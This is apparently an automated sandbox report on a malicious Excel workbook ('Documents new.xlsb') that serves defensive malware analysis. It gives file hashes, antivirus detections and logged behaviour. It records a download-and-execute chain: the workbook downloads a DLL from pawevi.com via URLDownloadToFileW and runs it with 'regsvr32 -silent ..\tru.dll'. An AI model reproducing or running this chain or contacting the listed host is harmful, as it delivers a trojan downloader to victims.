Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Sept. 10, 2021, 9:42 a.m.	Sept. 10, 2021, 9:44 a.m.

Size	324.3KB
Type	Zip archive data, at least v2.0 to extract
MD5	`e2c5c7d099745fa74d4653b6d49338d2`
SHA256	`8662d511c7f1bef3a6e4f6d72965760345b57ddf0de5d3e6eae4e610216a39c1`
CRC32	`91C09180`
ssdeep	`6144:4R+roOczZ5uoKG6qYR90sX9OYubAp2BAHDwRsX3+HnMtgG5HyQt:jkOczZoHqYR90a9nyE2n+uHnkpHy6`
Yara	None matched

EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office15\EXCEL.EXE" "C:\Users\test22\AppData\Local\Temp\Documents new.xlsb"
1936
- regsvr32.exe regsvr32 -silent ..\tru.dll
  2704

Name	Response	Post-Analysis Lookup
pawevi.com

IP Address	Status	Action
164.124.101.2	Active	Moloch

No Suricata Alerts

No Suricata TLS

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Sept. 10, 2021, 9:42 a.m.	process_identifier: 1936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6bdb2000 process_handle: 0xffffffff	1	0	0

file	C:\Users\test22\tru.dll

Time & API	Arguments	Status	Return	Repeated
NtCreateFile Sept. 10, 2021, 9:42 a.m.	create_disposition: 2 (FILE_CREATE) file_handle: 0x00000474 filepath: C:\Users\test22\AppData\Local\Temp\~$Documents new.xlsb desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES\|DELETE\|SYNCHRONIZE\|GENERIC_WRITE) file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$Documents new.xlsb create_options: 4198496 (FILE_NON_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT\|FILE_DELETE_ON_CLOSE) status_info: 2 (FILE_CREATED) share_access: 1 (FILE_SHARE_READ)	1	0	0

cmdline

regsvr32 -silent ..\tru.dll

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Sept. 10, 2021, 9:42 a.m.	process_identifier: 1936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x7ef70000 process_handle: 0xffffffff	1	0	0

Time & API	Arguments	Status	Return	Repeated
URLDownloadToFileW Sept. 10, 2021, 9:42 a.m.	url: https://pawevi.com/lch5.dll stack_pivoted: 0 filepath_r: ..\tru.dll filepath: C:\Users\test22\tru.dll		2148270085	0

parent_process

excel.exe

martian_process

regsvr32 -silent ..\tru.dll

FireEye	Trojan.GenericKD.46821851
ALYac	Trojan.Downloader.XLS.gen
Alibaba	TrojanDownloader:VBA/MalDoc.ali1000101
Cyren	XF/SneakyBin.AC.gen!Camelot
Symantec	Trojan.Gen.NPE
ESET-NOD32	a variant of Generik.HYXVNJK
Cynet	Malicious (score: 99)
Kaspersky	HEUR:Trojan-Downloader.MSOffice.SLoad.gen
BitDefender	Trojan.GenericKD.46821851
MicroWorld-eScan	Trojan.GenericKD.46821851
Ad-Aware	Trojan.GenericKD.46821851
Emsisoft	Trojan.GenericKD.46821851 (B)
Ikarus	Trojan.SuspectCRC
Avira	W97M/Dldr.Sload.mhxaz
Kingsoft	Macro.Excel.Downloader.xl.(kcloud)
Microsoft	TrojanDownloader:O97M/EncDoc.SMT!MTB
Gridinsoft	Trojan.U.Downloader.oa
ViRobot	XLS.Z.Agent.332087
GData	Trojan.GenericKD.46821851
AhnLab-V3	Downloader/XLS.Agent
MAX	malware (ai score=87)
Tencent	Trojan.MsOffice.Macro40.11013333
Fortinet	MSExcel/Agent.4214!tr.dldr

Documents new.xlsb